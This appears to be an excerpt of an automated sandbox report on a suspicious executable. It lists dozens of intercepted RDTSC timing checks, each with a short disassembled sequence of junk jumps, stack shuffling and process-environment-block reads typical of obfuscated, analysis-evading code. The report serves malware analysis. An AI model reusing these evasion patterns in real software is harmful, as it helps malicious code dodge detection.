Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713003D second address: 7130073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC19CEC1DCEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC19CEC1DCDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130073 second address: 7130079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130079 second address: 71300A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 0989h 0x00000007 mov eax, 5803B545h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC19CEC1DD7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71300A2 second address: 713011E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC19D472F2Fh 0x00000009 adc al, FFFFFF9Eh 0x0000000c jmp 00007FC19D472F39h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FC19D472F33h 0x0000001e jmp 00007FC19D472F33h 0x00000023 popfd 0x00000024 mov ax, 1A3Fh 0x00000028 popad 0x00000029 mov eax, dword ptr fs:[00000030h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FC19D472F31h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713011E second address: 713012E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 8Ah 0x00000005 mov edx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub esp, 18h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713012E second address: 7130132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130132 second address: 7130145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, 47A3B06Eh 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130145 second address: 7130149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130149 second address: 7130160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130160 second address: 7130166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130166 second address: 713018E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC19CEC1DD9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713018E second address: 7130192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130192 second address: 7130198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130198 second address: 71301A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 1F19h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71301A1 second address: 71301BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebx, dword ptr [eax+10h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC19CEC1DD1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71301BE second address: 7130224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FC19D472F2Eh 0x0000000f push eax 0x00000010 jmp 00007FC19D472F2Bh 0x00000015 xchg eax, esi 0x00000016 jmp 00007FC19D472F36h 0x0000001b mov esi, dword ptr [76EB06ECh] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC19D472F37h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130224 second address: 713022A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713022A second address: 713022E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713022E second address: 713029B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FC19CEC1DD7h 0x0000000f jne 00007FC19CEC2B78h 0x00000015 jmp 00007FC19CEC1DD6h 0x0000001a xchg eax, edi 0x0000001b pushad 0x0000001c push esi 0x0000001d pushfd 0x0000001e jmp 00007FC19CEC1DCDh 0x00000023 sbb esi, 1A076A46h 0x00000029 jmp 00007FC19CEC1DD1h 0x0000002e popfd 0x0000002f pop ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 mov bx, 2682h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713029B second address: 71302F3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC19D472F33h 0x00000008 sbb al, 0000007Eh 0x0000000b jmp 00007FC19D472F39h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FC19D472F31h 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC19D472F2Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71302F3 second address: 71302F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71302F9 second address: 7130358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [76E80B60h] 0x00000011 mov eax, 7617E5E0h 0x00000016 ret 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FC19D472F34h 0x0000001e xor eax, 47DC1138h 0x00000024 jmp 00007FC19D472F2Bh 0x00000029 popfd 0x0000002a mov ebx, esi 0x0000002c popad 0x0000002d push 00000044h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FC19D472F31h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130358 second address: 713040B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 jmp 00007FC19CEC1DD8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop edi 0x0000000e pushad 0x0000000f movzx ecx, di 0x00000012 call 00007FC19CEC1DD3h 0x00000017 mov edx, eax 0x00000019 pop ecx 0x0000001a popad 0x0000001b push ebx 0x0000001c jmp 00007FC19CEC1DD0h 0x00000021 mov dword ptr [esp], edi 0x00000024 pushad 0x00000025 mov eax, 72C57A5Dh 0x0000002a pushfd 0x0000002b jmp 00007FC19CEC1DCAh 0x00000030 or eax, 30FA1AB8h 0x00000036 jmp 00007FC19CEC1DCBh 0x0000003b popfd 0x0000003c popad 0x0000003d push dword ptr [eax] 0x0000003f jmp 00007FC19CEC1DD6h 0x00000044 mov eax, dword ptr fs:[00000030h] 0x0000004a jmp 00007FC19CEC1DD0h 0x0000004f push dword ptr [eax+18h] 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FC19CEC1DCAh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713040B second address: 713041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713041A second address: 7130421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, F5h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71304A2 second address: 71304A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71304A6 second address: 71304B2 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 7CA4h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71304B2 second address: 71304BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi], edi 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71304BF second address: 713051B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esi+04h], eax 0x00000009 pushad 0x0000000a mov eax, 13BCC517h 0x0000000f movzx esi, bx 0x00000012 popad 0x00000013 mov dword ptr [esi+08h], eax 0x00000016 jmp 00007FC19CEC1DCFh 0x0000001b mov dword ptr [esi+0Ch], eax 0x0000001e jmp 00007FC19CEC1DD6h 0x00000023 mov eax, dword ptr [ebx+4Ch] 0x00000026 pushad 0x00000027 mov edx, esi 0x00000029 mov dh, ah 0x0000002b popad 0x0000002c mov dword ptr [esi+10h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FC19CEC1DD0h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713051B second address: 713052D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19D472F2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713052D second address: 7130544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC19CEC1DCAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130544 second address: 7130556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19D472F2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130556 second address: 713057E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC19CEC1DD9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713057E second address: 7130584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130584 second address: 71305B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c pushad 0x0000000d mov ecx, 07B1D5BDh 0x00000012 pushad 0x00000013 movzx ecx, bx 0x00000016 mov edi, 23BDB198h 0x0000001b popad 0x0000001c popad 0x0000001d mov dword ptr [esi+18h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71305B1 second address: 71305B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71305B5 second address: 71305CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71305CD second address: 71305D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71305D3 second address: 713068D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b pushad 0x0000000c jmp 00007FC19CEC1DCFh 0x00000011 call 00007FC19CEC1DD8h 0x00000016 pushfd 0x00000017 jmp 00007FC19CEC1DD2h 0x0000001c sub esi, 466040B8h 0x00000022 jmp 00007FC19CEC1DCBh 0x00000027 popfd 0x00000028 pop ecx 0x00000029 popad 0x0000002a mov dword ptr [esi+1Ch], eax 0x0000002d pushad 0x0000002e mov dx, 47E8h 0x00000032 jmp 00007FC19CEC1DD1h 0x00000037 popad 0x00000038 mov eax, dword ptr [ebx+5Ch] 0x0000003b jmp 00007FC19CEC1DCEh 0x00000040 mov dword ptr [esi+20h], eax 0x00000043 pushad 0x00000044 call 00007FC19CEC1DCEh 0x00000049 pushad 0x0000004a popad 0x0000004b pop ecx 0x0000004c mov bx, 6124h 0x00000050 popad 0x00000051 mov eax, dword ptr [ebx+60h] 0x00000054 pushad 0x00000055 call 00007FC19CEC1DD5h 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713068D second address: 71306DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esi+24h], eax 0x00000009 jmp 00007FC19D472F2Dh 0x0000000e mov eax, dword ptr [ebx+64h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC19D472F33h 0x0000001a sbb si, BF4Eh 0x0000001f jmp 00007FC19D472F39h 0x00000024 popfd 0x00000025 mov edx, esi 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71306DF second address: 71306FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov ebx, 7D6435BAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+28h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC19CEC1DCCh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71306FD second address: 7130794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC19D472F31h 0x00000009 sbb cx, ACE6h 0x0000000e jmp 00007FC19D472F31h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FC19D472F30h 0x0000001a and cl, FFFFFF88h 0x0000001d jmp 00007FC19D472F2Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov eax, dword ptr [ebx+68h] 0x00000029 pushad 0x0000002a mov edi, esi 0x0000002c jmp 00007FC19D472F30h 0x00000031 popad 0x00000032 mov dword ptr [esi+2Ch], eax 0x00000035 jmp 00007FC19D472F30h 0x0000003a mov ax, word ptr [ebx+6Ch] 0x0000003e jmp 00007FC19D472F30h 0x00000043 mov word ptr [esi+30h], ax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130794 second address: 7130798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130798 second address: 71307B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71307B5 second address: 71307BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71307BB second address: 71307BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71307BF second address: 71307C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71307C3 second address: 71307D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71307D8 second address: 71307DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71307DC second address: 71307E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71307E2 second address: 7130850 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC19CEC1DD9h 0x00000009 or cx, 0276h 0x0000000e jmp 00007FC19CEC1DD1h 0x00000013 popfd 0x00000014 mov edi, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov word ptr [esi+32h], ax 0x0000001d jmp 00007FC19CEC1DCAh 0x00000022 mov eax, dword ptr [ebx+0000008Ch] 0x00000028 pushad 0x00000029 popad 0x0000002a mov dword ptr [esi+34h], eax 0x0000002d jmp 00007FC19CEC1DCFh 0x00000032 mov eax, dword ptr [ebx+18h] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov cx, dx 0x0000003b mov si, bx 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130850 second address: 71308C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c jmp 00007FC19D472F30h 0x00000011 mov eax, dword ptr [ebx+1Ch] 0x00000014 jmp 00007FC19D472F30h 0x00000019 mov dword ptr [esi+3Ch], eax 0x0000001c jmp 00007FC19D472F30h 0x00000021 mov eax, dword ptr [ebx+20h] 0x00000024 jmp 00007FC19D472F30h 0x00000029 mov dword ptr [esi+40h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71308C1 second address: 71308C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71308C7 second address: 7130900 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f jmp 00007FC19D472F30h 0x00000014 push 00000001h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov cx, dx 0x0000001c mov ecx, edx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130900 second address: 7130906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130906 second address: 713090A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713090A second address: 7130924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC19CEC1DCFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130924 second address: 71309A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC19D472F37h 0x00000011 sub cl, FFFFFFAEh 0x00000014 jmp 00007FC19D472F39h 0x00000019 popfd 0x0000001a jmp 00007FC19D472F30h 0x0000001f popad 0x00000020 nop 0x00000021 pushad 0x00000022 mov al, DCh 0x00000024 movsx edi, ax 0x00000027 popad 0x00000028 lea eax, dword ptr [ebp-10h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC19D472F31h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130A46 second address: 7130A87 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC19CEC1DCBh 0x00000008 and ax, B39Eh 0x0000000d jmp 00007FC19CEC1DD9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov edi, eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC19CEC1DCDh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130A87 second address: 7130B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 5F836D62h 0x00000008 pushfd 0x00000009 jmp 00007FC19D472F33h 0x0000000e and eax, 402C2E5Eh 0x00000014 jmp 00007FC19D472F39h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test edi, edi 0x0000001f jmp 00007FC19D472F2Eh 0x00000024 js 00007FC20D171B13h 0x0000002a pushad 0x0000002b mov cx, E5EDh 0x0000002f mov bx, cx 0x00000032 popad 0x00000033 mov eax, dword ptr [ebp-0Ch] 0x00000036 pushad 0x00000037 pushad 0x00000038 mov dl, ch 0x0000003a movsx edi, ax 0x0000003d popad 0x0000003e mov eax, 34448215h 0x00000043 popad 0x00000044 mov dword ptr [esi+04h], eax 0x00000047 jmp 00007FC19D472F30h 0x0000004c lea eax, dword ptr [ebx+78h] 0x0000004f jmp 00007FC19D472F30h 0x00000054 push 00000001h 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FC19D472F37h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130B37 second address: 7130C08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FC19CEC1DCEh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FC19CEC1DD1h 0x00000017 sbb ax, 3CC6h 0x0000001c jmp 00007FC19CEC1DD1h 0x00000021 popfd 0x00000022 mov ax, 7D77h 0x00000026 popad 0x00000027 nop 0x00000028 pushad 0x00000029 movzx ecx, dx 0x0000002c mov dl, FDh 0x0000002e popad 0x0000002f lea eax, dword ptr [ebp-08h] 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FC19CEC1DCAh 0x00000039 adc cl, FFFFFF98h 0x0000003c jmp 00007FC19CEC1DCBh 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007FC19CEC1DD8h 0x00000048 sub cx, 3AF8h 0x0000004d jmp 00007FC19CEC1DCBh 0x00000052 popfd 0x00000053 popad 0x00000054 nop 0x00000055 jmp 00007FC19CEC1DD6h 0x0000005a push eax 0x0000005b pushad 0x0000005c push edi 0x0000005d mov ecx, 7483D5B3h 0x00000062 pop ecx 0x00000063 push eax 0x00000064 push edx 0x00000065 push ebx 0x00000066 pop ecx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130C7A second address: 7130CA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007FC19D472F30h 0x00000010 test edi, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130CA2 second address: 7130CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
